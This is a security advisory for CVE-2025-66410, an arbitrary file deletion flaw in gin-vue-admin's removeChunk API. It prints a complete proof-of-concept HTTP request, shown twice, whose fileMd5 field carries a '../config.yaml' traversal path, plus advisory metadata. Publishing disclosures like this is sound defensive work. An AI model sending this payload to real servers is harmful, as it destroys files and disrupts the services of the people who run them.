GHSA-JRHG-82W2-VVJ7
Vulnerability from github – Published: 2025-12-02 01:08 – Updated: 2025-12-02 01:08Impact
Attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder
The affected code:
Affected interfaces: /api/fileUploadAndDownload/removeChunk
POC: You can specify the FileMd5 value as the directory or file you want to delete
```POST /api/fileUploadAndDownload/removeChunk HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 78 sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118" x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Content-Type: application/json Accept: application/json, text/plain, / x-user-id: 1 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8080/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ Connection: close
{"fileName":"ceshi.jpg","fileMd5":"../config.yaml","filePath":"./fileDir/ceshi.jpg"}
```
Patches
Please wait for the latest patch
References
https://github.com/flipped-aurora/gin-vue-admin
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/flipped-aurora/gin-vue-admin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.1-0.20251201084432-ee8d8d7e04d9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66410"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-02T01:08:48Z",
"nvd_published_at": "2025-12-01T23:15:53Z",
"severity": "HIGH"
},
"details": "### Impact\nAttackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the \u0027FileMd5\u0027 parameter to delete any file and folder\n\n The affected code:\n\n\nAffected interfaces:\n/api/fileUploadAndDownload/removeChunk\n\n\nPOC:\nYou can specify the FileMd5 value as the directory or file you want to delete\n\n```POST /api/fileUploadAndDownload/removeChunk HTTP/1.1\nHost: 127.0.0.1:8080\nContent-Length: 78\nsec-ch-ua: \"Not=A?Brand\";v=\"99\", \"Chromium\";v=\"118\"\nx-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36\nContent-Type: application/json\nAccept: application/json, text/plain, */*\nx-user-id: 1\nsec-ch-ua-platform: \"Windows\"\nOrigin: http://127.0.0.1:8080\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://127.0.0.1:8080/\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ\nConnection: close\n\n{\"fileName\":\"ceshi.jpg\",\"fileMd5\":\"../config.yaml\",\"filePath\":\"./fileDir/ceshi.jpg\"}\n```\n\n\n### Patches\nPlease wait for the latest patch\n\n### References\nhttps://github.com/flipped-aurora/gin-vue-admin",
"id": "GHSA-jrhg-82w2-vvj7",
"modified": "2025-12-02T01:08:48Z",
"published": "2025-12-02T01:08:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66410"
},
{
"type": "WEB",
"url": "https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6"
},
{
"type": "PACKAGE",
"url": "https://github.com/flipped-aurora/gin-vue-admin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Gin-vue-admin has an arbitrary file deletion vulnerability"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.